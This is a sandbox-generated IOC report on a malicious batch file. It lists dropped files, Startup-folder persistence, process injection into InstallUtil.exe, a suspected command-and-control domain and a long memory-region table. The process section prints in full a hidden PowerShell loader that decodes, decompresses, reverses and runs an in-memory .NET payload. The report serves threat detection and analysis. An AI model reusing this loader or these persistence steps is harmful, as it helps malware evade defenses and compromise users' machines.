IOC Report
87M9Y3P4Z7.bat

loading gif

Files

File Path
Type
Category
Malicious
87M9Y3P4Z7.bat
Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41utsmme.lr0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugmfo5g.xfc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjg1ezd5.dmv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\ChannelUris.bat
Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
dropped
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\ChannelUris.bat:Zone.Identifier
ASCII text, with CRLF line terminators
modified
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
PE32 executable (console) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
malicious
C:\Windows\System32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
malicious
C:\Windows\System32\attrib.exe
attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
malicious
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
malicious
C:\Windows\System32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
malicious
C:\Windows\System32\attrib.exe
attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
malicious
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
unknown
http://nffplp.com
unknown
http://nuget.org/NuGet.exe
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://account.dyn.com/
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://ocsp.sectigo.com0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
http://crt.sectigo.com/cPan/
unknown
http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
unknown
https://github.com/Pester/Pester
unknown
http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
unknown
https://github.com/mgravell/protobuf-neti
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
nffplp.com
163.44.198.71
malicious
s-part-0017.t-0009.t-msedge.net
13.107.246.45

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
163.44.198.71
nffplp.com
Singapore
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
382000
remote allocation
page execute and read and write
malicious
5095000
trusted library allocation
page read and write
malicious
8820000
trusted library section
page read and write
malicious
276E000
trusted library allocation
page read and write
malicious
6E93000
trusted library allocation
page read and write
malicious
2872000
trusted library allocation
page read and write
malicious
6052000
trusted library allocation
page read and write
malicious
4BCC000
trusted library allocation
page read and write
malicious
6783000
trusted library allocation
page read and write
malicious
680D000
trusted library allocation
page read and write
malicious
2791000
trusted library allocation
page read and write
malicious
5783000
trusted library allocation
page read and write
malicious
284F000
trusted library allocation
page read and write
malicious
2741000
trusted library allocation
page read and write
malicious
52F9000
trusted library allocation
page read and write
malicious
2823000
trusted library allocation
page read and write
malicious
708E000
stack
page read and write
4C9E000
trusted library allocation
page read and write
53E6000
trusted library allocation
page read and write
55EB000
trusted library allocation
page read and write
55C1000
trusted library allocation
page read and write
4D83000
trusted library allocation
page read and write
4B31000
heap
page read and write
559C000
trusted library allocation
page read and write
4A52000
trusted library allocation
page read and write
4DC6000
trusted library allocation
page read and write
858D000
stack
page read and write
55A8000
trusted library allocation
page read and write
4FB4000
trusted library allocation
page read and write
556E000
trusted library allocation
page read and write
1C7977BC000
heap
page read and write
6170000
heap
page read and write
4EB9000
trusted library allocation
page read and write
7D3A000
trusted library allocation
page read and write
5D60000
trusted library allocation
page read and write
5908000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
800000
heap
page read and write
4B5B000
trusted library allocation
page read and write
4D23000
trusted library allocation
page read and write
84D6000
stack
page read and write
629E000
stack
page read and write
28A0000
heap
page execute and read and write
4F8E000
trusted library allocation
page read and write
4B41000
heap
page read and write
4BB0000
heap
page read and write
1C9000
stack
page read and write
58E5000
trusted library allocation
page read and write
5139000
trusted library allocation
page read and write
54D8000
trusted library allocation
page read and write
6E30000
trusted library allocation
page read and write
8E71000
trusted library allocation
page read and write
5EC0000
trusted library allocation
page read and write
5395000
trusted library allocation
page read and write
4D4D000
trusted library allocation
page read and write
5894000
trusted library allocation
page read and write
58BE000
trusted library allocation
page read and write
545D000
trusted library allocation
page read and write
8B00000
trusted library allocation
page read and write
27AA000
trusted library allocation
page read and write
4CEE000
stack
page read and write
4E78000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
5300000
heap
page read and write
5647000
trusted library allocation
page read and write
4E68000
trusted library allocation
page read and write
619E000
unkown
page read and write
4A20000
trusted library allocation
page read and write
7D0000
heap
page read and write
4E08000
trusted library allocation
page read and write
54A6000
trusted library allocation
page read and write
72FD000
stack
page read and write
1B79F890000
heap
page read and write
8AB0000
trusted library allocation
page read and write
4E7A000
trusted library allocation
page read and write
5833000
trusted library allocation
page read and write
2A02000
heap
page read and write
58C4000
trusted library allocation
page read and write
2640000
heap
page read and write
3051000
heap
page read and write
2782000
trusted library allocation
page read and write
588E000
trusted library allocation
page read and write
5666000
trusted library allocation
page read and write
8B0C000
trusted library allocation
page read and write
5478000
trusted library allocation
page read and write
5461000
trusted library allocation
page read and write
5816000
trusted library allocation
page read and write
5664000
trusted library allocation
page read and write
63AF000
stack
page read and write
284D000
trusted library allocation
page read and write
4A23000
trusted library allocation
page execute and read and write
4CA6000
trusted library allocation
page read and write
5527000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
4D51000
trusted library allocation
page read and write
4ED1000
trusted library allocation
page read and write
30D7000
heap
page read and write
6B4E000
stack
page read and write
5401000
trusted library allocation
page read and write
5523000
trusted library allocation
page read and write
C9E000
stack
page read and write
5D7D000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5806000
trusted library allocation
page read and write
25FE000
stack
page read and write
4F11000
trusted library allocation
page read and write
5F30000
trusted library allocation
page read and write
280A000
trusted library allocation
page read and write
3E0000
heap
page read and write
53AE000
trusted library allocation
page read and write
7A70000
heap
page read and write
6D5A000
heap
page read and write
4A30000
trusted library allocation
page read and write
4A10000
trusted library allocation
page read and write
1CD000
stack
page read and write
4320000
heap
page execute and read and write
4E04000
trusted library allocation
page read and write
4EEB000
trusted library allocation
page read and write
4F8C000
trusted library allocation
page read and write
6C22000
heap
page read and write
2FF0000
heap
page read and write
5122000
trusted library allocation
page read and write
4A42000
trusted library allocation
page read and write
4EAF000
trusted library allocation
page read and write
5DBE000
stack
page read and write
4B71000
trusted library allocation
page read and write
275B000
trusted library allocation
page read and write
55F1000
trusted library allocation
page read and write
75CE000
stack
page read and write
4EA5000
trusted library allocation
page read and write
5122000
trusted library allocation
page read and write
56B0000
trusted library allocation
page read and write
5581000
trusted library allocation
page read and write
DE4000
trusted library allocation
page read and write
562A000
trusted library allocation
page read and write
539B000
trusted library allocation
page read and write
3779000
trusted library allocation
page read and write
4F82000
trusted library allocation
page read and write
874000
trusted library allocation
page read and write
4F3F000
trusted library allocation
page read and write
8652000
trusted library allocation
page read and write
7F490000
trusted library allocation
page execute and read and write
96E000
heap
page read and write
42CE000
stack
page read and write
50FF000
trusted library allocation
page read and write
4A55000
trusted library allocation
page execute and read and write
738E000
stack
page read and write
53F9000
trusted library allocation
page read and write
4F1C000
trusted library allocation
page read and write
2963000
heap
page read and write
59B8000
heap
page read and write
4F88000
trusted library allocation
page read and write
6DCA000
heap
page read and write
3044000
heap
page read and write
5615000
trusted library allocation
page read and write
79BE000
stack
page read and write
51B6000
trusted library allocation
page read and write
250D000
trusted library allocation
page execute and read and write
581C000
trusted library allocation
page read and write
AD3000
heap
page read and write
251D000
trusted library allocation
page execute and read and write
AE0000
trusted library allocation
page execute and read and write
7682000
heap
page read and write
4DA0000
trusted library allocation
page read and write
4B62000
trusted library allocation
page read and write
4FCB000
heap
page read and write
8AFB000
trusted library allocation
page read and write
564D000
trusted library allocation
page read and write
2756000
trusted library allocation
page read and write
A7B000
trusted library allocation
page execute and read and write
274D000
stack
page read and write
4B5E000
trusted library allocation
page read and write
2510000
trusted library allocation
page read and write
868E000
trusted library allocation
page read and write
5427000
trusted library allocation
page read and write
27A4000
trusted library allocation
page read and write
4E77000
trusted library allocation
page read and write
4EF0000
trusted library allocation
page read and write
4DC2000
trusted library allocation
page read and write
5831000
trusted library allocation
page read and write
8C86000
heap
page read and write
4F73000
trusted library allocation
page read and write
5688000
trusted library allocation
page read and write
4CF7000
trusted library allocation
page read and write
8100000
trusted library allocation
page read and write
3CC0679000
stack
page read and write
4DB7000
trusted library allocation
page read and write
543E000
trusted library allocation
page read and write
873000
trusted library allocation
page execute and read and write
4F4C000
trusted library allocation
page read and write
8874000
heap
page read and write
1FEEE410000
heap
page read and write
49F6000
trusted library allocation
page read and write
72BA000
stack
page read and write
B00000
trusted library allocation
page read and write
8CD000
trusted library allocation
page execute and read and write
4C51000
trusted library allocation
page read and write
4C9C000
trusted library allocation
page read and write
276E000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
4F41000
trusted library allocation
page read and write
514E000
trusted library allocation
page read and write
6F9000
stack
page read and write
E17000
heap
page read and write
4E94000
trusted library allocation
page read and write
723E000
stack
page read and write
4E4A000
heap
page read and write
C50000
trusted library allocation
page read and write
37F1000
trusted library allocation
page read and write
5464000
trusted library allocation
page read and write
293B000
heap
page read and write
24E0000
trusted library section
page read and write
54DC000
trusted library allocation
page read and write
2F10000
heap
page read and write
A6A000
trusted library allocation
page execute and read and write
2700000
heap
page read and write
278D000
trusted library allocation
page read and write
632E000
stack
page read and write
4FD1000
trusted library allocation
page read and write
4B7D000
trusted library allocation
page read and write
616E000
stack
page read and write
80A0000
trusted library allocation
page read and write
733B000
stack
page read and write
8210000
trusted library allocation
page execute and read and write
8870000
heap
page read and write
8AA0000
trusted library allocation
page read and write
FD2F8FE000
stack
page read and write
430F000
stack
page read and write
5510000
trusted library allocation
page read and write
51B0000
trusted library allocation
page read and write
8CC0000
heap
page read and write
A10000
trusted library allocation
page read and write
545F000
trusted library allocation
page read and write
5197000
trusted library allocation
page read and write
5536000
trusted library allocation
page read and write
54F5000
trusted library allocation
page read and write
DC0000
heap
page read and write
248000
unkown
page execute read
2E6C000
stack
page read and write
1FEEE1A0000
heap
page read and write
1FEEE120000
heap
page read and write
717D000
stack
page read and write
4E30000
trusted library allocation
page read and write
652E000
stack
page read and write
3CC077F000
stack
page read and write
53AA000
trusted library allocation
page read and write
4EBB000
trusted library allocation
page read and write
8C30000
trusted library allocation
page execute and read and write
58A9000
trusted library allocation
page read and write
8C1000
heap
page read and write
5CBE000
stack
page read and write
6D7A000
trusted library allocation
page read and write
9E2000
trusted library allocation
page read and write
5589000
trusted library allocation
page read and write
559E000
trusted library allocation
page read and write
50DC000
stack
page read and write
482E000
stack
page read and write
4F6F000
trusted library allocation
page read and write
4CFA000
trusted library allocation
page read and write
2570000
heap
page read and write
5493000
trusted library allocation
page read and write
5442000
trusted library allocation
page read and write
276C000
trusted library allocation
page read and write
58C9000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
545B000
trusted library allocation
page read and write
5FB0000
trusted library allocation
page read and write
7B50000
heap
page read and write
55DC000
trusted library allocation
page read and write
4F5A000
trusted library allocation
page read and write
9820000
trusted library allocation
page execute and read and write
547A000
trusted library allocation
page read and write
4B82000
trusted library allocation
page read and write
513B000
trusted library allocation
page read and write
55DA000
trusted library allocation
page read and write
5544000
trusted library allocation
page read and write
1B79FAB5000
heap
page read and write
4CD8000
trusted library allocation
page read and write
589B000
trusted library allocation
page read and write
58A1000
trusted library allocation
page read and write
4D68000
trusted library allocation
page read and write
6730000
heap
page read and write
7F90000
trusted library allocation
page execute and read and write
548F000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
289E000
stack
page read and write
6797000
trusted library allocation
page read and write
54BD000
trusted library allocation
page read and write
7FBB0000
trusted library allocation
page execute and read and write
51A6000
trusted library allocation
page read and write
5496000
trusted library allocation
page read and write
4C5E000
trusted library allocation
page read and write
4D1F000
trusted library allocation
page read and write
1FEEE150000
heap
page read and write
4F6E000
stack
page read and write
2530000
trusted library allocation
page read and write
4D0C000
trusted library allocation
page read and write
30B1000
heap
page read and write
5414000
trusted library allocation
page read and write
C5E000
stack
page read and write
3240000
trusted library section
page read and write
BA8000
trusted library allocation
page read and write
69A0000
heap
page read and write
55A4000
trusted library allocation
page read and write
592E000
heap
page read and write
82E000
stack
page read and write
A5E000
stack
page read and write
22183FE0000
heap
page read and write
582F000
trusted library allocation
page read and write
5814000
trusted library allocation
page read and write
5F60000
trusted library allocation
page execute and read and write
5F34000
trusted library allocation
page read and write
5105000
trusted library allocation
page read and write
54DE000
trusted library allocation
page read and write
58AF000
trusted library allocation
page read and write
548B000
trusted library allocation
page read and write
6D10000
heap
page read and write
48A1000
trusted library allocation
page read and write
3DE000
stack
page read and write
4DE1000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
251000
unkown
page write copy
252000
unkown
page readonly
4890000
heap
page read and write
55D4000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
4E0C000
trusted library allocation
page read and write
704E000
stack
page read and write
4A46000
trusted library allocation
page execute and read and write
7D40000
trusted library section
page read and write
4F33000
trusted library allocation
page read and write
AA0000
heap
page read and write
4F70000
heap
page execute and read and write
34D000
stack
page read and write
7E70000
heap
page read and write
6CBD000
trusted library allocation
page read and write
518D000
trusted library allocation
page read and write
D28000
trusted library allocation
page read and write
5DFE000
stack
page read and write
2218404B000
heap
page read and write
4DE7000
trusted library allocation
page read and write
4E0A000
trusted library allocation
page read and write
4D85000
trusted library allocation
page read and write
4DEA000
heap
page read and write
56C0000
trusted library allocation
page read and write
4AFE000
stack
page read and write
4DFA000
trusted library allocation
page read and write
34A000
stack
page read and write
4A3D000
trusted library allocation
page execute and read and write
8160000
trusted library allocation
page execute and read and write
1E13D86C000
heap
page read and write
4E21000
trusted library allocation
page read and write
93B8000
heap
page read and write
7C10000
trusted library allocation
page read and write
D7E000
stack
page read and write
4D57000
trusted library allocation
page read and write
7AA0000
trusted library allocation
page read and write
53E9000
trusted library allocation
page read and write
5617000
trusted library allocation
page read and write
5698000
trusted library allocation
page read and write
5489000
trusted library allocation
page read and write
4DBB000
trusted library allocation
page read and write
5696000
trusted library allocation
page read and write
4CC1000
trusted library allocation
page read and write
555E000
trusted library allocation
page read and write
88C0000
trusted library allocation
page execute and read and write
586F000
trusted library allocation
page read and write
4E75000
trusted library allocation
page read and write
5161000
trusted library allocation
page read and write
4E9C000
trusted library allocation
page read and write
764F000
stack
page read and write
2F60000
heap
page read and write
691E000
stack
page read and write
85E0000
trusted library allocation
page execute and read and write
2A28000
heap
page read and write
635E000
stack
page read and write
8500000
trusted library allocation
page read and write
4CAA000
trusted library allocation
page read and write
5487000
trusted library allocation
page read and write
8630000
trusted library allocation
page read and write
5444000
trusted library allocation
page read and write
7E80000
heap
page read and write
4F80000
trusted library allocation
page read and write
5FD1000
trusted library allocation
page read and write
550E000
trusted library allocation
page read and write
291E000
stack
page read and write
4CC5000
trusted library allocation
page read and write
5DDE000
stack
page read and write
4CFC000
stack
page read and write
6E80000
trusted library allocation
page read and write
559A000
trusted library allocation
page read and write
552B000
trusted library allocation
page read and write
557F000
trusted library allocation
page read and write
5628000
trusted library allocation
page read and write
8B2C000
trusted library allocation
page read and write
261E000
stack
page read and write
4F46000
trusted library allocation
page read and write
4EDF000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
981000
heap
page read and write
5118000
trusted library allocation
page read and write
54A4000
trusted library allocation
page read and write
88E000
stack
page read and write
8ABD000
trusted library allocation
page read and write
5EFD000
stack
page read and write
5107000
trusted library allocation
page read and write
93E9000
heap
page read and write
8850000
trusted library allocation
page read and write
4350000
heap
page read and write
4EAD000
trusted library allocation
page read and write
54FE000
trusted library allocation
page read and write
6E60000
trusted library allocation
page read and write
55D8000
trusted library allocation
page read and write
62DE000
stack
page read and write
4DA4000
trusted library allocation
page read and write
4FB6000
trusted library allocation
page read and write
9DF000
stack
page read and write
4D3D000
stack
page read and write
9EA000
trusted library allocation
page execute and read and write
8970000
trusted library allocation
page read and write
325A000
heap
page read and write
4EE9000
trusted library allocation
page read and write
5103000
trusted library allocation
page read and write
4E62000
trusted library allocation
page read and write
AE1000
heap
page read and write
55BB000
trusted library allocation
page read and write
53FD000
trusted library allocation
page read and write
5583000
trusted library allocation
page read and write
5101000
trusted library allocation
page read and write
76636C000
stack
page read and write
24F0000
trusted library allocation
page read and write
4E6A000
trusted library allocation
page read and write
4D4B000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
5374000
trusted library allocation
page read and write
8A0000
trusted library allocation
page read and write
221840C6000
heap
page read and write
1B79F820000
heap
page read and write
4A4A000
trusted library allocation
page execute and read and write
7050000
trusted library allocation
page read and write
4E98000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
4C85000
trusted library allocation
page read and write
6F9E000
stack
page read and write
5801000
trusted library allocation
page read and write
8230000
trusted library allocation
page execute and read and write
51A4000
trusted library allocation
page read and write
5199000
trusted library allocation
page read and write
549C000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
4C7F000
trusted library allocation
page read and write
3102000
heap
page read and write
58B3000
trusted library allocation
page read and write
4D0A000
trusted library allocation
page read and write
4E8A000
trusted library allocation
page read and write
4CDE000
trusted library allocation
page read and write
5607000
trusted library allocation
page read and write
4CEF000
trusted library allocation
page read and write
58EA000
trusted library allocation
page read and write
8640000
trusted library allocation
page read and write
5383000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
1C7979A4000
heap
page read and write
5491000
trusted library allocation
page read and write
58BC000
trusted library allocation
page read and write
78F0000
trusted library allocation
page read and write
4D8C000
trusted library allocation
page read and write
5385000
trusted library allocation
page read and write
77DA000
heap
page read and write
7030000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
A75000
trusted library allocation
page execute and read and write
5892000
trusted library allocation
page read and write
53AC000
trusted library allocation
page read and write
4F3B000
trusted library allocation
page read and write
5846000
trusted library allocation
page read and write
5694000
trusted library allocation
page read and write
1C7976C0000
heap
page read and write
4D32000
trusted library allocation
page read and write
4D5A000
trusted library allocation
page read and write
54EF000
trusted library allocation
page read and write
C70000
heap
page read and write
88F0000
trusted library section
page read and write
5873000
trusted library allocation
page read and write
1E13D850000
heap
page read and write
FD2FCFF000
stack
page read and write
783F000
heap
page read and write
53E2000
trusted library allocation
page read and write
B11000
heap
page read and write
2799000
trusted library allocation
page read and write
249E000
stack
page read and write
5370000
trusted library allocation
page read and write
6039000
trusted library allocation
page read and write
4E3A000
trusted library allocation
page read and write
1E13D7C0000
heap
page read and write
2776000
trusted library allocation
page read and write
7B60000
trusted library allocation
page execute and read and write
543C000
trusted library allocation
page read and write
5429000
trusted library allocation
page read and write
3F0000
unkown
page readonly
FD2F56A000
stack
page read and write
28C0000
trusted library allocation
page read and write
2FAE000
stack
page read and write
4CDC000
trusted library allocation
page read and write
321F000
stack
page read and write
85CE000
stack
page read and write
54BB000
trusted library allocation
page read and write
FD301FB000
stack
page read and write
7E60000
trusted library allocation
page read and write
AF0000
trusted library allocation
page read and write
9F5000
trusted library allocation
page execute and read and write
6760000
trusted library allocation
page execute and read and write
7890000
trusted library allocation
page read and write
5D80000
trusted library allocation
page read and write
4CB7000
trusted library allocation
page read and write
77B1000
heap
page read and write
3711000
trusted library allocation
page read and write
4B76000
trusted library allocation
page read and write
4E3C000
trusted library allocation
page read and write
39267E000
stack
page read and write
84F0000
trusted library allocation
page execute and read and write
564F000
trusted library allocation
page read and write
71FE000
stack
page read and write
8CD000
heap
page read and write
5D90000
trusted library allocation
page execute and read and write
7666FF000
stack
page read and write
277F000
trusted library allocation
page read and write
A90000
trusted library allocation
page read and write
5FD9000
trusted library allocation
page read and write
22184040000
heap
page read and write
4D7E000
stack
page read and write
4D74000
trusted library allocation
page read and write
4D6C000
trusted library allocation
page read and write
4D4F000
trusted library allocation
page read and write
4EE3000
trusted library allocation
page read and write
8980000
trusted library allocation
page execute and read and write
4ECC000
stack
page read and write
286E000
trusted library allocation
page read and write
5FAD000
stack
page read and write
556C000
trusted library allocation
page read and write
5372000
trusted library allocation
page read and write
2808000
trusted library allocation
page read and write
1C7977B0000
heap
page read and write
3F1000
unkown
page execute read
428E000
stack
page read and write
39239F000
stack
page read and write
569A000
trusted library allocation
page read and write
1E13D860000
heap
page read and write
AED000
heap
page read and write
5649000
trusted library allocation
page read and write
2FED000
stack
page read and write
4DE9000
trusted library allocation
page read and write
4DED000
trusted library allocation
page read and write
7460000
heap
page read and write
55CC000
trusted library allocation
page read and write
5690000
trusted library allocation
page read and write
4FC7000
heap
page read and write
2A00000
heap
page read and write
401000
unkown
page read and write
5114000
trusted library allocation
page read and write
4EB1000
trusted library allocation
page read and write
5381000
trusted library allocation
page read and write
2790000
trusted library allocation
page read and write
7B4E000
stack
page read and write
4D2E000
trusted library allocation
page read and write
4CEB000
trusted library allocation
page read and write
C40000
trusted library allocation
page execute and read and write
699B000
stack
page read and write
5585000
trusted library allocation
page read and write
1FEEE415000
heap
page read and write
659E000
stack
page read and write
4CF3000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
5884000
trusted library allocation
page read and write
53E0000
trusted library allocation
page read and write
57F9000
trusted library allocation
page read and write
A66000
trusted library allocation
page execute and read and write
53B4000
trusted library allocation
page read and write
6080000
trusted library allocation
page execute and read and write
85D0000
heap
page read and write
DF0000
heap
page execute and read and write
9F7000
trusted library allocation
page execute and read and write
2711000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
84E000
stack
page read and write
5568000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
8B40000
trusted library allocation
page read and write
58DB000
trusted library allocation
page read and write
C1F000
stack
page read and write
53CD000
trusted library allocation
page read and write
6D0D000
trusted library allocation
page read and write
B3A000
heap
page read and write
70E0000
heap
page execute and read and write
8510000
heap
page read and write
797E000
stack
page read and write
4A24000
trusted library allocation
page read and write
2930000
heap
page read and write
4E92000
trusted library allocation
page read and write
7B70000
heap
page read and write
6F9000
stack
page read and write
1E13D7E0000
heap
page read and write
63EE000
stack
page read and write
5651000
trusted library allocation
page read and write
5692000
trusted library allocation
page read and write
6687000
trusted library allocation
page read and write
584C000
trusted library allocation
page read and write
9E6000
trusted library allocation
page execute and read and write
55B7000
trusted library allocation
page read and write
4F39000
trusted library allocation
page read and write
5D64000
trusted library allocation
page read and write
4EB5000
trusted library allocation
page read and write
4ECA000
trusted library allocation
page read and write
4CBD000
trusted library allocation
page read and write
5660000
trusted library allocation
page read and write
1B79FAB0000
heap
page read and write
6ED0000
trusted library allocation
page read and write
8B22000
trusted library allocation
page read and write
880000
trusted library allocation
page read and write
4E9A000
trusted library allocation
page read and write
1C7977B7000
heap
page read and write
287A000
trusted library allocation
page read and write
7B4C000
stack
page read and write
5F20000
trusted library allocation
page read and write
940000
heap
page read and write
241000
unkown
page execute read
4A00000
